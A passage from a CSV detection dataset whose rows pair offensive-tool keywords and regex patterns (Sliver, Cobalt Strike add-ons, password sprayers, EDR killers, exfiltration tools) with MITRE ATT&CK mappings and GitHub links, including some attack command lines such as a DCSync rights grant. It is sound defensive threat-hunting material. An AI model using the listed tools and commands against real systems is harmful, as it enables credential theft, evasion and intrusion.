- T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dac2f647397f3465db18352b2cc0286948f5d00e4467eac9176c0b4318aa8ff1*",".{0,1000}dac2f647397f3465db18352b2cc0286948f5d00e4467eac9176c0b4318aa8ff1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*dac48d1f87a5d34496182771b76988929cc81463c576110b866165902f30b3bf*",".{0,1000}dac48d1f87a5d34496182771b76988929cc81463c576110b866165902f30b3bf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*dacledit.py -action write -rights DCSync -principal * -target-dn *",".{0,1000}dacledit\.py\s\-action\swrite\s\-rights\sDCSync\s\-principal\s.{0,1000}\s\-target\-dn\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dadc9d874254d500356528ea6bfedbe9f8db453c4d64e2dfd7d68f97cd0f973d*",".{0,1000}dadc9d874254d500356528ea6bfedbe9f8db453c4d64e2dfd7d68f97cd0f973d.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*DAE3997B-D51B-4D9F-9F11-2EBC6FDDF57C*",".{0,1000}DAE3997B\-D51B\-4D9F\-9F11\-2EBC6FDDF57C.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*dae7d1a42b0bb178bff2ca9729c31d59db045cd65db817cc9eca7a1721bc4c57*",".{0,1000}dae7d1a42b0bb178bff2ca9729c31d59db045cd65db817cc9eca7a1721bc4c57.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*daem0nc0re/PrivFu*",".{0,1000}daem0nc0re\/PrivFu.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*daem0nc0re/VectorKernel*",".{0,1000}daem0nc0re\/VectorKernel.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*dafthack/DomainPasswordSpray*",".{0,1000}dafthack\/DomainPasswordSpray.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*dafthack/GraphRunner*",".{0,1000}dafthack\/GraphRunner.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*dafthack/HostRecon*",".{0,1000}dafthack\/HostRecon.{0,1000}","offensive_tool_keyword","HostRecon","Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.","T1082 - T1087 - T1033","TA0001 - TA0007 - ","N/A","N/A","Information Gathering","https://github.com/dafthack/HostRecon","1","1","N/A","N/A","5","414","117","2017-10-03T13:25:06Z","2017-03-28T14:53:21Z" "*dafthack/MailSniper*",".{0,1000}dafthack\/MailSniper.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*dafthack/MFASweep*",".{0,1000}dafthack\/MFASweep.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1192","164","2024-01-31T22:52:58Z","2020-09-22T16:25:03Z" "*dafthack/RDPSpray*",".{0,1000}dafthack\/RDPSpray.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*dahvid.schloss@echeloncyber.com*",".{0,1000}dahvid\.schloss\@echeloncyber\.com.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*dahvidschloss/PILOT*",".{0,1000}dahvidschloss\/PILOT.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","1","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*DallasFR/Cobalt-Clip*",".{0,1000}DallasFR\/Cobalt\-Clip.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*DallasFR/WinShellcode*",".{0,1000}DallasFR\/WinShellcode.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*DAMP-master.zip",".{0,1000}DAMP\-master\.zip","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*DancingRightToLeft.py*",".{0,1000}DancingRightToLeft\.py.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*danielbohannon*",".{0,1000}danielbohannon.{0,1000}","offensive_tool_keyword","Github Username","Github user author of powershell obfuscation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/danielbohannon","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*danielmiessler/SecLists*",".{0,1000}danielmiessler\/SecLists.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*danielmiessler/SecLists.git*",".{0,1000}danielmiessler\/SecLists\.git.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*DanMcInerney/Empire*",".{0,1000}DanMcInerney\/Empire.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*DanMcInerney/icebreaker*",".{0,1000}DanMcInerney\/icebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*DanMcInerney/net-creds*",".{0,1000}DanMcInerney\/net\-creds.{0,1000}","offensive_tool_keyword","net-creds","Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.","T1040 - T1039 - T1036 - T1003","TA0006 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/net-creds","1","1","N/A","N/A","10","1622","429","2023-11-02T10:46:03Z","2015-01-07T18:47:46Z" "*DanMcInerney/theHarvester*",".{0,1000}DanMcInerney\/theHarvester.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*danti1988/adcshunter*",".{0,1000}danti1988\/adcshunter.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","1","N/A","7","1","76","7","2023-12-15T10:49:39Z","2023-12-14T14:31:05Z" "*daphne-main.zip*",".{0,1000}daphne\-main\.zip.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","15","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" "*daphne-x64 * pid=*",".{0,1000}daphne\-x64\s.{0,1000}\spid\=.{0,1000}","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","0","N/A","8","1","15","3","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" "*darkarmour -f *.exe --encrypt xor --jmp --loop 7 -o *.exe*",".{0,1000}darkarmour\s\-f\s.{0,1000}\.exe\s\-\-encrypt\sxor\s\-\-jmp\s\-\-loop\s7\s\-o\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*darkarmour.py*",".{0,1000}darkarmour\.py.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","690","117","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*darkarmour-master*",".{0,1000}darkarmour\-master.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","690","117","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*DarkCoderSc/SharpShellPipe*",".{0,1000}DarkCoderSc\/SharpShellPipe.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*darkhotel backdoor*",".{0,1000}darkhotel\sbackdoor.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*DarkHotel C2*",".{0,1000}DarkHotel\sC2.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*darkhotel data exfil server*",".{0,1000}darkhotel\sdata\sexfil\sserver.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*darkhotel_headers*",".{0,1000}darkhotel_headers.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*DarkLoadLibrary-maser*",".{0,1000}DarkLoadLibrary\-maser.{0,1000}","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","1","N/A","10","10","990","199","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" "*darkr4y/geacon*",".{0,1000}darkr4y\/geacon.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*DarkRCovery.exe*",".{0,1000}DarkRCovery\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DarkRCovery.exe*",".{0,1000}DarkRCovery\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Darkside.exe -p*",".{0,1000}Darkside\.exe\s\-p.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*Darkside-master.zip*",".{0,1000}Darkside\-master\.zip.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","1","N/A","10","2","117","24","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z" "*darkweb2017-top100.txt*",".{0,1000}darkweb2017\-top100\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*DarkWidow-main*",".{0,1000}DarkWidow\-main.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*das add -db dbname masscan *",".{0,1000}das\sadd\s\-db\sdbname\smasscan\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*das add -db dbname rustscan *",".{0,1000}das\sadd\s\-db\sdbname\srustscan\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*das report -hosts 192.168.1.0/24 -oA report2*",".{0,1000}das\sreport\s\-hosts\s192\.168\.1\.0\/24\s\-oA\sreport2.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*das scan -db dbname -hosts all -oA report1 -nmap '-Pn -sVC -O' -parallel*",".{0,1000}das\sscan\s\-db\sdbname\s\-hosts\sall\s\-oA\sreport1\s\-nmap\s\'\-Pn\s\-sVC\s\-O\'\s\-parallel.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*das scan -db dbname -ports 22*80*443*445 -show*",".{0,1000}das\sscan\s\-db\sdbname\s\-ports\s22.{0,1000}80.{0,1000}443.{0,1000}445\s\-show.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dashlane2john.py*",".{0,1000}dashlane2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Data Name=""ServiceName"">chopper*",".{0,1000}Data\sName\=\""ServiceName\""\>chopper\<\/Data\>.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*Data Name=""ServiceName"">final_seg*",".{0,1000}Data\sName\=\""ServiceName\""\>final_seg\<\/Data\>.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*Data Name=""ServiceName"">let me in*",".{0,1000}Data\sName\=\""ServiceName\""\>let\sme\sin\<\/Data\>.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*data/implant/*/host.ps1*",".{0,1000}data\/implant\/.{0,1000}\/host\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*data/ipwn*",".{0,1000}data\/ipwn.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - 